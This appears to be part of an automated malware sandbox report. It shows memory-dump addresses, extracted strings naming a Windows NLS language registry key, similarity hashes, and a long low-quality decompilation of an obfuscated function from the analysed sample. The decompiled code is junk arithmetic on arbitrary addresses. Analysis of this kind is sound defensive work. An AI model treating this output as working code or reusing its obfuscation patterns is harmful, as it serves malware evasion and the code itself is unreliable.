                                                                      0x00000000
                                                                      0x00a554ab
                                                                      0x00a554b4
                                                                      0x00a554bc
                                                                      0x00a554c8
                                                                      0x00a554de
                                                                      0x00a554fb
                                                                      0x00a554e0
                                                                      0x00a554e6
                                                                      0x00a554eb
                                                                      0x00a554eb
                                                                      0x00a554de
                                                                      0x00000000
                                                                      0x00a554bc
                                                                      0x00a55477
                                                                      0x00a5547a
                                                                      0x00a55480
                                                                      0x00a55483
                                                                      0x00a55486
                                                                      0x00a5548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a5548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55447
                                                                      0x00a55447
                                                                      0x00a55447
                                                                      0x00a55447
                                                                      0x00a5544e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55450
                                                                      0x00a55452
                                                                      0x00a55455
                                                                      0x00a5545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a5545c
                                                                      0x00a5546a
                                                                      0x00a5546d
                                                                      0x00a5546f
                                                                      0x00000000
                                                                      0x00a5546f
                                                                      0x009fe70f

                                                                      Strings
                                                                      • @, xrefs: 009FE6C0
                                                                      • InstallLanguageFallback, xrefs: 009FE6DB
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009FE68C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: 6c9468758458dc6de0a94ed3669391be746a093735dbe08bf79cddd01114f9f5
                                                                      • Instruction ID: 5ca7575c24926f26c1871d8c97f67a84787a86b533e3c6bcf49d9b31298514ea
                                                                      • Opcode Fuzzy Hash: 6c9468758458dc6de0a94ed3669391be746a093735dbe08bf79cddd01114f9f5
                                                                      • Instruction Fuzzy Hash: E3518CB29083499BC714DF64C450ABBB3E9BF88715F05092EFA8597250EB34DD4887A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 31%
                                                                      			E0041B829(void* __eax, signed int __ecx, void* __edx, signed int __edi, void* __esi) {
                                                                      				signed int _t78;
                                                                      				signed int _t79;
                                                                      				signed int _t80;
                                                                      				signed int _t81;
                                                                      				void* _t83;
                                                                      				signed char _t86;
                                                                      				signed char _t89;
                                                                      				signed int _t101;
                                                                      				signed int _t104;
                                                                      				void* _t110;
                                                                      				signed char _t135;
                                                                      				signed char _t141;
                                                                      				void* _t144;
                                                                      				signed int _t171;
                                                                      				signed int _t175;
                                                                      				signed int _t176;
                                                                      				void* _t177;
                                                                      				signed int _t189;
                                                                      				intOrPtr _t190;
                                                                      				intOrPtr _t201;
                                                                      				intOrPtr _t211;
                                                                      				signed int _t213;
                                                                      				signed int _t215;
                                                                      				signed int _t217;
                                                                      				signed int _t218;
                                                                      				signed int _t219;
                                                                      				signed int _t221;
                                                                      				void* _t222;
                                                                      				signed int _t224;
                                                                      				signed int _t225;
                                                                      				signed int _t226;
                                                                      				void* _t230;
                                                                      				void* _t234;
                                                                      				void* _t262;
                                                                      
                                                                      				asm("sbb eax, 0x8f465ae7");
                                                                      				 *0x2646cbf2 =  *0x2646cbf2 << 0x37;
                                                                      				 *0x19e43268 =  *0x19e43268 ^ __edi;
                                                                      				_pop(_t225);
                                                                      				 *0x51c9a64 =  *0x51c9a64 ^ __ecx;
                                                                      				_t233 =  *0xf7e7d169 * 0x40ca;
                                                                      				 *0x5d054ba9 =  *0x5d054ba9 >> 0xf4;
                                                                      				asm("adc eax, 0x95b1482e");
                                                                      				asm("sbb [0x70dea7bb], ecx");
                                                                      				_t226 = _t225 |  *0x18b8860f;
                                                                      				asm("lodsd");
                                                                      				asm("adc [0x41ebb9da], esi");
                                                                      				 *0x33a6d182 =  *0x33a6d182 >> 0x7d;
                                                                      				_t155 = 0xc3edf7fd;
                                                                      				 *0xadfcf6e4 =  *0xadfcf6e4 + 0xc3edf7fd;
                                                                      				 *0x1717fff6 =  *0x1717fff6 << 0xce;
                                                                      				_t109 = 0x5b;
                                                                      				_t171 =  *0x2744d3a1;
                                                                      				_t133 =  *0xbf10c7ef;
                                                                      				 *0xbf10c7ef = __ecx;
                                                                      				asm("adc [0xaa13f02b], edx");
                                                                      				if(( *0x50f5812 &  *0xe5c58bd5) - 1 + 1 <= 0) {
                                                                      					_t233 =  *0x22938e7f * 0x3196;
                                                                      					if( *0x2b57f6b * 0xc22c > 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t226 =  *0x3d02857f * 0xe5c1;
                                                                      					asm("adc dh, [0xdf65dea8]");
                                                                      					 *0x91bf2ad9 =  *0x91bf2ad9 >> 0x77;
                                                                      					 *0xc396849a = _t233;
                                                                      					asm("sbb ebx, [0xa0d5c513]");
                                                                      					 *0x44dca31a =  *0x44dca31a << 0xae;
                                                                      					asm("sbb cl, [0xb0909fc6]");
                                                                      					asm("sbb ebp, 0xa0091d94");
                                                                      					_t109 = 0xba;
                                                                      					asm("cmpsw");
                                                                      					_pop(_t233);
                                                                      					 *0x7d35dbee =  *0x7d35dbee - (_t171 &  *0x64796926);
                                                                      					asm("rol byte [0x73a31104], 0xea");
                                                                      					 *0xcd6e9f29 =  *0xcd6e9f29 & _t133;
                                                                      					_pop(_t155);
                                                                      					asm("adc dl, [0x1834181c]");
                                                                      					asm("stosd");
                                                                      					 *0x3788408 =  *0x3788408 - 0xba;
                                                                      					if( *0x3788408 < 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("scasd");
                                                                      					asm("sbb edx, [0x2e9c7b25]");
                                                                      					_t155 = 0x34;
                                                                      					asm("sbb [0x641981e5], ah");
                                                                      					asm("sbb [0xb610cbd8], edx");
                                                                      					 *0x44bebd9 =  *0x44bebd9 & 0xb2687e8c;
                                                                      					 *0x7e71f405 =  *0x7e71f405 + 0xb2687e8c;
                                                                      					_t109 = 0xf2;
                                                                      					asm("ror dword [0x6553c405], 0x64");
                                                                      					_t233 = _t233 - 1 + 1;
                                                                      					 *0xab2c05f2 =  *0xab2c05f2 >> 0xae;
                                                                      					 *0x5f263b1 =  *0x5f263b1 & 0x00000034;
                                                                      					L1();
                                                                      					 *0x631405f2 =  *0x631405f2 ^ _t133;
                                                                      					if( *0x631405f2 >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("ror dword [0x5f24d73], 0x1f");
                                                                      					_t86 = 0xffffffffb2687e8d ^  *0x88555503;
                                                                      					 *0x3b040dfb =  *0x3b040dfb - _t233;
                                                                      					asm("rcl byte [0xd030b18], 0x4b");
                                                                      					_t226 = _t226 ^  *0xac9fcf05;
                                                                      					_pop(_t141);
                                                                      					 *0x7b7305f2 =  *0x7b7305f2 >> 0x63;
                                                                      					 *0x61a291be =  *0x61a291be >> 0x1b;
                                                                      					 *0xd9bb07f2 =  *0xd9bb07f2 ^ _t86;
                                                                      					 *0xe32a07b6 =  *0xe32a07b6 ^ 0x000000f2;
                                                                      					 *0x3cdad06f =  *0x3cdad06f & 0xb2687e8c;
                                                                      					_t109 = 0xa2;
                                                                      					 *0x53ae0707 =  *0x53ae0707 << 0xa4;
                                                                      					 *0xb644d7bf =  *0xf25d9792;
                                                                      					_t155 = ( *0x599904 -  *0x40d050a &  *0x263907b6) +  *0x9b177b87;
                                                                      					_t133 = _t141 & 0;
                                                                      					 *0x8ca6312 =  *0x8ca6312 >> 0xa7;
                                                                      					asm("sbb ebp, 0xf6e8bf25");
                                                                      					asm("adc edi, 0xca65b72f");
                                                                      					asm("rcl byte [0x6e675f08], 0xfb");
                                                                      					 *0x5814f9f3 = 0x70426d1f;
                                                                      					asm("rcl byte [0x72d08ca], 0xb5");
                                                                      					_t211 =  *0x9ca71db;
                                                                      					_push(0xc3edf7fd);
                                                                      					_t89 = _t86 + 0x00000001 | 0x1aea213d;
                                                                      					asm("cmpsb");
                                                                      					_t42 = _t233;
                                                                      					_t233 =  *0x9e1802b;
                                                                      					 *0x9e1802b = _t42;
                                                                      					if(0xb2687e8c >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_pop(_t233);
                                                                      					_t109 =  *0xe1680cb2;
                                                                      					 *0xe1680cb2 = 0xa2;
                                                                      					_t262 = _t211 -  *0x5cd5dd09;
                                                                      					if(_t262 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("adc [0x31ce9b7b], eax");
                                                                      					if(_t262 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_pop(_t230);
                                                                      					 *0x4f229ee1 =  *0x4f229ee1 >> 0xdf;
                                                                      					L1();
                                                                      					 *0x14e1ce8 = _t89;
                                                                      					_t144 = 0x5f263a3;
                                                                      					 *0xed7511ca =  *0xed7511ca << 0xdc;
                                                                      					 *0xfcb874e6 =  *0xfcb874e6 & _t89;
                                                                      					asm("ror byte [0xc3848fa0], 0x56");
                                                                      					 *0xcc39a381 = _t144 - 0x00000001 | 0x000000b1;
                                                                      					_pop(_t213);
                                                                      					asm("movsb");
                                                                      					asm("adc dh, 0xd0");
                                                                      					 *0x9dda421 = _t213;
                                                                      					asm("rol dword [0xfe65f8f], 0x11");
                                                                      					 *0x8de39204 =  *0x8de39204 >> 0xbb;
                                                                      					asm("adc [0x44ba0cb3], dh");
                                                                      					asm("sbb cl, [0xae8a45b2]");
                                                                      					asm("adc edi, 0xb8e41635");
                                                                      					 *0x1ac773c1 =  *0x1ac773c1 + ( *0xcc39a381 |  *0x2ca812ca) - 1;
                                                                      					asm("rol dword [0xc916b6ff], 0xdc");
                                                                      					asm("rcr dword [0x492a0ca3], 0xf1");
                                                                      					asm("adc ebx, [0x2693b1fb]");
                                                                      					_t215 =  *0x9dda421 &  *0xe99e2a6e;
                                                                      					_pop( *0x1955b43f);
                                                                      					asm("sbb esi, 0x1ccfdf2f");
                                                                      					asm("sbb esi, [0xac39aa6f]");
                                                                      					asm("ror dword [0xd5c54df1], 0xb3");
                                                                      					asm("movsw");
                                                                      					asm("sbb esp, [0xde4352ed]");
                                                                      					_t155 =  *0xcc9f2260 * 0x00003904 &  *0x185a7f0d;
                                                                      					asm("lodsb");
                                                                      					asm("adc [0x19d5a4d9], eax");
                                                                      					asm("adc ah, [0xd7a3661c]");
                                                                      					 *0xe4e92261 =  *0xe4e92261 & _t215;
                                                                      					 *0xd917805 =  *0xd917805 + _t215;
                                                                      					asm("adc al, [0x4620e3e7]");
                                                                      					_pop(_t133);
                                                                      					asm("rcr byte [0x2cbfe0b3], 0xe0");
                                                                      					 *0x6190322a =  *0x6190322a << 0xb7;
                                                                      					asm("adc ebx, [0x2d49de05]");
                                                                      					asm("rol dword [0xaeea04f8], 0x25");
                                                                      					 *0x8134c513 =  *0x8134c513 << 0xe3;
                                                                      					_pop(_t109);
                                                                      					 *0x9bebb294 =  *0x9bebb294 >> 0x3b;
                                                                      					_t189 =  *0x1ffe2f60 * 0xf9cd;
                                                                      					 *0xa4d5e139 =  *0xa4d5e139 ^ _t215;
                                                                      					asm("ror byte [0xcd56e4b3], 0xe2");
                                                                      					_t226 = _t230 - 0x00000001 ^  *0x10968cdf;
                                                                      					_t233 = 0xa36f8c6 +  *0x546b0d;
                                                                      					_t217 = _t215 - 0x72683d6d | 0x2982182b;
                                                                      					if(_t217 >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					 *0x9095f073 =  *0x9095f073 & _t155;
                                                                      					_t218 = _t217 &  *0x54e63e6e;
                                                                      					 *0xf5390e18 =  *0xf5390e18 & 0x00000014;
                                                                      					_t226 = _t226 ^  *0x33d49e0b;
                                                                      					 *0x4ed762c =  *0x4ed762c - 0x34;
                                                                      					 *0x3ccbc9bd =  *0x3ccbc9bd | _t189;
                                                                      					asm("ror dword [0x38adb411], 0xa3");
                                                                      					_t109 = (0x000000e2 &  *0x56d56335) - 0x34;
                                                                      					asm("rcr byte [0xec32f4b7], 0x2d");
                                                                      					 *0xc6bb19cf =  *0xc6bb19cf + 0x11111a99;
                                                                      					 *0x3c05dad3 =  *0x3c05dad3 ^ _t155;
                                                                      					_t233 =  *0x2d147c94;
                                                                      					_t155 = _t155 - 0x63484c9c;
                                                                      					asm("adc esp, 0xd1610ec");
                                                                      					asm("adc edi, [0xec3598bd]");
                                                                      					asm("ror dword [0xe6ee2617], 0x3f");
                                                                      					asm("sbb ecx, [0x73495616]");
                                                                      					if(0x11111a99 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t219 = _t218 ^ 0xf332907a;
                                                                      					_t226 = _t226 | 0x2bcfe78e;
                                                                      					_pop(_t190);
                                                                      					_t233 =  *0x84844683;
                                                                      					asm("sbb [0xbf22d562], eax");
                                                                      					asm("sbb esi, [0x991821f4]");
                                                                      					asm("rol byte [0x8f73ce2], 0x2");
                                                                      					 *0xb72747fa =  *0xb72747fa >> 0xef;
                                                                      					_t155 = _t155 &  *0xca5601c9;
                                                                      					asm("rol dword [0x28ff160d], 0x43");
                                                                      					asm("sbb [0x191646bc], ebp");
                                                                      					asm("rcl dword [0x31135999], 0x8b");
                                                                      					 *0x830f96f5 =  *0x830f96f5 ^ _t233;
                                                                      					asm("sbb dh, 0xb5");
                                                                      					asm("lodsd");
                                                                      					if( *0x830f96f5 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t226 = _t226 ^  *0xe0342fd4;
                                                                      					_t233 = _t233 |  *0x5978c9cd;
                                                                      					 *0x63c5ca1e = _t190;
                                                                      					_t155 = _t155 - 1;
                                                                      					_push(0x11111a99);
                                                                      					asm("rcr byte [0x5a34bf63], 0x72");
                                                                      					 *0xa45a179c =  *0xa45a179c + _t155;
                                                                      					asm("sbb cl, [0xa3d7ff04]");
                                                                      					_push( *0xf100fa3);
                                                                      					_t133 = _t133 &  *0x9721fe2c;
                                                                      					asm("sbb esp, [0x491fc107]");
                                                                      					asm("ror dword [0x3b9c3d8b], 0xf5");
                                                                      					if(_t133 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t226 = _t226 ^  *0xdb180c75;
                                                                      					 *0x7cff5ecf =  *0x7cff5ecf +  *0x510abe69 * 0x4ab7;
                                                                      					 *0x578927b0 =  *0x578927b0 ^ 0x000000e2;
                                                                      					 *0x5417e0c6 =  *0x5417e0c6 - 0x14;
                                                                      					asm("rol dword [0x3148cd92], 0x5a");
                                                                      					 *0x1fc75200 =  *0x1fc75200 - 0xe2;
                                                                      					asm("adc [0x8604bf0a], cl");
                                                                      					 *0x61da671e =  *0x61da671e + _t155;
                                                                      					_push(_t233);
                                                                      					_t221 = _t219 - 0xdaa00f3d &  *0x3b9c3d8b;
                                                                      					if(_t221 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t233 = 0xeae80d75;
                                                                      					_t155 = _t155 - 0x29c19503;
                                                                      					 *0x84256719 = 0xeae80d75;
                                                                      					asm("adc [0x19be309a], esi");
                                                                      					asm("sbb ecx, [0xb910753b]");
                                                                      					_t222 = _t221 + 0xc67fba93;
                                                                      					 *0x933aef17 =  *0x933aef17 << 0x34;
                                                                      					_t133 = 0xb6;
                                                                      					asm("sbb esp, [0x4b1161da]");
                                                                      					asm("adc edi, [0x770498a1]");
                                                                      					_t109 = _t109 ^ 0x000000a8;
                                                                      					 *0x557117e6 =  *0x557117e6 + 0x34;
                                                                      					asm("stosb");
                                                                      					if(0xb6 >=  *0x36aa15cf) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_pop(_t133);
                                                                      					_t109 = _t109 +  *0x3c49e2b + 1;
                                                                      					asm("sbb edx, [0x9f182c83]");
                                                                      					 *0x853cfe13 = 0xf2;
                                                                      					 *0x30ae912e =  *0x30ae912e >> 0x8a;
                                                                      					_pop(_t101);
                                                                      					if(_t222 !=  *0x94f70c6f) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("rcl dword [0x7f0ced7a], 0x27");
                                                                      					_t133 = 0x8a;
                                                                      					asm("stosd");
                                                                      					asm("sbb esi, [0x12727c2b]");
                                                                      					asm("sbb ch, 0x12");
                                                                      					asm("adc cl, 0x8a");
                                                                      					asm("adc [0xa1154614], al");
                                                                      					 *0xbf4decbc =  *0xbf4decbc << 8;
                                                                      					 *0x12cac1d2 =  *0x12cac1d2 >> 0xf1;
                                                                      					 *0x8bb38ab3 =  *0x8bb38ab3 >> 0xc6;
                                                                      					_t104 = (_t101 ^ 0x842d1515) - 0xc8;
                                                                      					_push(0xb7);
                                                                      					_push(0xeae80d75);
                                                                      					 *0xea9f4be =  *0xea9f4be << 0xbb;
                                                                      					_t224 =  *0x46d6bf29 | 0x892cc71d;
                                                                      					_t155 = 0xb7;
                                                                      					 *0xb55ffa9d =  *0xb55ffa9d >> 0xd4;
                                                                      					_push( *0x3ca59991);
                                                                      					_t109 =  *0x8379c014;
                                                                      					 *0x8379c014 = 0xd;
                                                                      					 *0x5100f2fb =  *0x5100f2fb >> 0xe5;
                                                                      					if( *0xb55ffa9d >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					 *0x31937373 =  *0x31937373 ^ 0xeae80d75;
                                                                      					 *0xc8dc9031 =  *0xc8dc9031 + 0x8a;
                                                                      					 *0xda573036 = 0x9210b481;
                                                                      					asm("rcl dword [0x13ef4003], 0x62");
                                                                      					 *0x5976c0c0 =  *0x5976c0c0 << 0x38;
                                                                      					 *0x2284e71a =  *0x2284e71a ^ (0xb7 +  *0xbdef13ca |  *0x6a51b2be);
                                                                      					asm("scasb");
                                                                      					 *0xfdf56ea0 =  *0xfdf56ea0 >> 0x7b;
                                                                      					asm("adc ecx, 0x2b9e8bd9");
                                                                      					_push( *0x666c28c);
                                                                      					asm("adc esi, [0xe9b91d3]");
                                                                      					asm("adc dl, [0x291159a2]");
                                                                      					L1();
                                                                      					 *0x1e1309e8 =  *0x1e1309e8 << 0xbe;
                                                                      					_push(_t226 - 0x56961b68);
                                                                      					asm("lodsb");
                                                                      					 *0x3c35620f =  *0x3c35620f | _t224;
                                                                      					return (_t104 |  *0x69dc859a) +  *0xac5dbae7;
                                                                      				}
                                                                      				L1:
                                                                      				_push( *0x2fc73f09);
                                                                      				asm("rcl dword [0x417854f3], 0x68");
                                                                      				_push(_t133);
                                                                      				_t133 = _t133 &  *0x79b40de1;
                                                                      				_push( *0x6bc2ecb);
                                                                      				asm("rcl dword [0xfa2f8e6e], 0x6");
                                                                      				asm("rol dword [0xc597d0f], 0xf");
                                                                      				_t201 =  *0x938fa7df;
                                                                      				asm("adc ecx, 0x329b57fa");
                                                                      				if(_t133 >= 0) {
                                                                      					 *0x8a685578 =  *0x8a685578 + _t201;
                                                                      					 *0x84a21108 =  *0x84a21108 - _t109;
                                                                      					if( *0x84a21108 == 0) {
                                                                      						asm("rcr byte [0xb1ea05ca], 0x29");
                                                                      						asm("adc ah, [0x88d74ee6]");
                                                                      						_pop(_t135);
                                                                      						 *0xf3576913 =  *0xf3576913 ^ _t135;
                                                                      						asm("rol byte [0xf75e22b2], 0x78");
                                                                      						asm("adc ebx, [0xec0cb267]");
                                                                      						_t110 = _t109 + 0x10;
                                                                      						 *0x9904b26f = 0xdf24103;
                                                                      						asm("cmpsw");
                                                                      						asm("rcr dword [0x28cad8f5], 0xc2");
                                                                      						 *0xa61f20c =  *0x9904b26f;
                                                                      						 *0xd2cb6bf7 =  *0xd2cb6bf7 - _t201;
                                                                      						asm("sbb esi, [0x55094f61]");
                                                                      						_t133 = (_t135 &  *0xf0976124 | 0x263c72ed) - 0xe3;
                                                                      						asm("adc [0x79efa9b6], ah");
                                                                      						_t78 =  *0xa61f20c &  *0x5e1aa64;
                                                                      						asm("sbb [0x528c0af2], bl");
                                                                      						_push(_t110);
                                                                      						_t155 = _t155 -  *0x737811df;
                                                                      						asm("rcl byte [0x5c0a4f30], 0xbd");
                                                                      						asm("sbb [0x886b48db], ecx");
                                                                      						_t109 = _t110 + 1 - 0xa8;
                                                                      						_push(_t155);
                                                                      						asm("sbb [0xc12442c8], ebx");
                                                                      						 *0x389651f4 =  *0x389651f4 ^  *0x4f314760 * 0x00005e0f;
                                                                      						if( *0x389651f4 == 0) {
                                                                      							asm("rcl byte [0xbe53561c], 0x3f");
                                                                      							asm("sbb [0xd228f6cd], edx");
                                                                      							 *0x5a49d6e2 =  *0x5a49d6e2 + _t109;
                                                                      							asm("adc bl, 0xa8");
                                                                      							asm("rol dword [0x6ac69135], 0xb9");
                                                                      							asm("adc bh, [0xde121eb1]");
                                                                      							asm("stosb");
                                                                      							asm("scasb");
                                                                      							_t234 = _t233 + 0x972558f4;
                                                                      							_push( *0xbf800b87);
                                                                      							asm("sbb esp, [0xa7c8f26]");
                                                                      							asm("sbb ebp, 0x1e463306");
                                                                      							asm("scasd");
                                                                      							_t79 = _t78 + 0xa;
                                                                      							 *0xba50f739 =  *0xba50f739 + _t234;
                                                                      							 *0x26717701 =  *0x26717701 >> 0x59;
                                                                      							_t233 = _t234 - 1;
                                                                      							asm("adc [0xdd24ebbc], eax");
                                                                      							 *0x1460419c =  *0x1460419c + _t233;
                                                                      							asm("sbb [0x6653f3f8], eax");
                                                                      							_t155 =  *0xb5169018;
                                                                      							asm("ror byte [0xf7b21810], 0xba");
                                                                      							_pop(_t175);
                                                                      							_t109 = (_t109 + 0xf8e86ed4 ^ 0x0000002c) -  *0x3250f267;
                                                                      							_t226 = _t226 -  *0xfcb988bd - 0x4c31203e -  *0xfb10f01f;
                                                                      							asm("adc ebx, [0x8530f9db]");
                                                                      							if(( *0x878838b9 & _t79) != 0) {
                                                                      								asm("sbb [0x979bc474], ebp");
                                                                      								_t176 = _t175 |  *0x6a3745f0;
                                                                      								_push( *0x32555021);
                                                                      								_t109 = _t109 - 1;
                                                                      								_t133 = _t133 -  *0xa156bda1;
                                                                      								asm("lodsd");
                                                                      								_t155 =  *0x6987d61b;
                                                                      								if(( *0x506514ee & _t176) < 0) {
                                                                      									_push(_t176);
                                                                      									asm("adc eax, [0x545ad0c5]");
                                                                      									 *0x56095dc5 =  *0x56095dc5 | _t226;
                                                                      									_t133 = _t133 -  *0x153c1bc6 ^  *0xdbb7991d;
                                                                      									asm("rol dword [0xe16db0fd], 0x44");
                                                                      									_t80 = _t79 -  *0x1ff74f0b;
                                                                      									_push( *0x11919b09);
                                                                      									 *0x41bd0e0b =  *0x41bd0e0b | _t233;
                                                                      									asm("rcr byte [0x3206c9a2], 0x7f");
                                                                      									_t109 = 0;
                                                                      									asm("sbb eax, [0xe11919b]");
                                                                      									asm("adc [0xe2aa090e], ebp");
                                                                      									 *0x990e3c8d =  *0x990e3c8d << 0x2e;
                                                                      									_t233 = _t233 -  *0x5e3d8981;
                                                                      									if(_t233 >= 0) {
                                                                      										_push( *0x317bab72);
                                                                      										 *0xb5b08232 =  *0xb5b08232 >> 0x63;
                                                                      										_t133 = _t133 &  *0x2455123c;
                                                                      										 *0x9b15e9b7 = _t80;
                                                                      										 *0x268ffb92 =  *0x268ffb92 & _t80;
                                                                      										_push(_t80);
                                                                      										_t81 = _t80 ^ 0x12a9fcfc;
                                                                      										asm("rcr byte [0x698370e1], 0x6b");
                                                                      										if(_t81 == 0) {
                                                                      											 *0x578ac775 = _t233;
                                                                      											_push(0);
                                                                      											_t177 = _t176 - 1;
                                                                      											 *0x77667382 =  *0x77667382 | _t155;
                                                                      											 *0x77eae00d =  *0x77eae00d - _t155;
                                                                      											asm("movsb");
                                                                      											_t109 =  *0x2e184135;
                                                                      											_t233 =  *0x578ac775 - 1;
                                                                      											_push( *0xe43a14c5);
                                                                      											 *0x61d2e428 =  *0x61d2e428 | _t81 - 0x000000b1;
                                                                      											_t133 =  *0x29bbf407;
                                                                      											if(0xffffffffffeb71d5 == 0) {
                                                                      												asm("ror dword [0x5b49775], 0xd9");
                                                                      												asm("sbb bl, 0x86");
                                                                      												_t109 = _t109 - 0x8c0ae168 &  *0x4f5bef25;
                                                                      												_t83 =  *0x47d38017;
                                                                      												 *0xc6e4fe87 =  *0xc6e4fe87 & _t155;
                                                                      												asm("sbb [0x171e1f9c], ecx");
                                                                      												 *0x1b1eab62 = _t177 - 0xfedc04fd;
                                                                      												asm("adc dl, 0xc9");
                                                                      												 *0x6451cdb3 =  *0x6451cdb3 + _t109;
                                                                      												_t133 = 0xce1bb28e;
                                                                      												_push(_t83);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				goto L1;
                                                                      			}





































                                                                      0x0041b830
                                                                      0x0041b846
                                                                      0x0041b84e
                                                                      0x0041b854
                                                                      0x0041b85b
                                                                      0x0041b861
                                                                      0x0041b871
                                                                      0x0041b878
                                                                      0x0041b885
                                                                      0x0041b88b
                                                                      0x0041b89b
                                                                      0x0041b89e
                                                                      0x0041b8a4
                                                                      0x0041b8ab
                                                                      0x0041b8b1
                                                                      0x0041b8b7
                                                                      0x0041b8be
                                                                      0x0041b8c2
                                                                      0x0041b8c8
                                                                      0x0041b8c8
                                                                      0x0041b8ce
                                                                      0x0041b8d4
                                                                      0x0041b8da
                                                                      0x0041b8f4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041b8fa
                                                                      0x0041b904
                                                                      0x0041b90a
                                                                      0x0041b911
                                                                      0x0041b91d
                                                                      0x0041b923
                                                                      0x0041b930
                                                                      0x0041b943
                                                                      0x0041b949
                                                                      0x0041b94c
                                                                      0x0041b94e
                                                                      0x0041b94f
                                                                      0x0041b955
                                                                      0x0041b95c
                                                                      0x0041b962
                                                                      0x0041b963
                                                                      0x0041b969
                                                                      0x0041b96a
                                                                      0x0041b970
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041b97c
                                                                      0x0041b97d
                                                                      0x0041b983
                                                                      0x0041b985
                                                                      0x0041b98b
                                                                      0x0041b99c
                                                                      0x0041b9a2
                                                                      0x0041b9a9
                                                                      0x0041b9ab
                                                                      0x0041b9b2
                                                                      0x0041b9b3
                                                                      0x0041b9ba
                                                                      0x0041b9c0
                                                                      0x0041b9cb
                                                                      0x0041b9d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041b9d7
                                                                      0x0041b9e5
                                                                      0x0041b9f7
                                                                      0x0041ba03
                                                                      0x0041ba0a
                                                                      0x0041ba10
                                                                      0x0041ba11
                                                                      0x0041ba1e
                                                                      0x0041ba25
                                                                      0x0041ba3d
                                                                      0x0041ba43
                                                                      0x0041ba49
                                                                      0x0041ba4c
                                                                      0x0041ba53
                                                                      0x0041ba5c
                                                                      0x0041ba62
                                                                      0x0041ba65
                                                                      0x0041ba6c
                                                                      0x0041ba72
                                                                      0x0041ba78
                                                                      0x0041ba7f
                                                                      0x0041ba85
                                                                      0x0041ba93
                                                                      0x0041ba99
                                                                      0x0041ba9a
                                                                      0x0041ba9f
                                                                      0x0041baa0
                                                                      0x0041baa0
                                                                      0x0041baa0
                                                                      0x0041baa6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bab2
                                                                      0x0041bab3
                                                                      0x0041bab3
                                                                      0x0041bab9
                                                                      0x0041babf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bac5
                                                                      0x0041bacb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bad7
                                                                      0x0041bade
                                                                      0x0041baeb
                                                                      0x0041baf0
                                                                      0x0041bb04
                                                                      0x0041bb05
                                                                      0x0041bb0c
                                                                      0x0041bb15
                                                                      0x0041bb2c
                                                                      0x0041bb39
                                                                      0x0041bb40
                                                                      0x0041bb41
                                                                      0x0041bb4a
                                                                      0x0041bb50
                                                                      0x0041bb57
                                                                      0x0041bb80
                                                                      0x0041bb86
                                                                      0x0041bb8c
                                                                      0x0041bb98
                                                                      0x0041bb9e
                                                                      0x0041bba7
                                                                      0x0041bbae
                                                                      0x0041bbbe
                                                                      0x0041bbd0
                                                                      0x0041bbdf
                                                                      0x0041bbe5
                                                                      0x0041bbeb
                                                                      0x0041bbf8
                                                                      0x0041bc00
                                                                      0x0041bc06
                                                                      0x0041bc13
                                                                      0x0041bc14
                                                                      0x0041bc1a
                                                                      0x0041bc29
                                                                      0x0041bc2f
                                                                      0x0041bc35
                                                                      0x0041bc3b
                                                                      0x0041bc42
                                                                      0x0041bc49
                                                                      0x0041bc50
                                                                      0x0041bc56
                                                                      0x0041bc5d
                                                                      0x0041bc65
                                                                      0x0041bc66
                                                                      0x0041bc6d
                                                                      0x0041bc77
                                                                      0x0041bc7e
                                                                      0x0041bc85
                                                                      0x0041bc91
                                                                      0x0041bc97
                                                                      0x0041bc9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bca3
                                                                      0x0041bca9
                                                                      0x0041bcb7
                                                                      0x0041bcbd
                                                                      0x0041bcc3
                                                                      0x0041bcc9
                                                                      0x0041bccf
                                                                      0x0041bcd6
                                                                      0x0041bce5
                                                                      0x0041bcec
                                                                      0x0041bcf2
                                                                      0x0041bcf8
                                                                      0x0041bcfe
                                                                      0x0041bd04
                                                                      0x0041bd16
                                                                      0x0041bd1c
                                                                      0x0041bd23
                                                                      0x0041bd29
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bd2f
                                                                      0x0041bd35
                                                                      0x0041bd41
                                                                      0x0041bd42
                                                                      0x0041bd4b
                                                                      0x0041bd51
                                                                      0x0041bd57
                                                                      0x0041bd5e
                                                                      0x0041bd65
                                                                      0x0041bd6b
                                                                      0x0041bd72
                                                                      0x0041bd7e
                                                                      0x0041bd85
                                                                      0x0041bd8b
                                                                      0x0041bd8e
                                                                      0x0041bd8f
                                                                      0x00000000
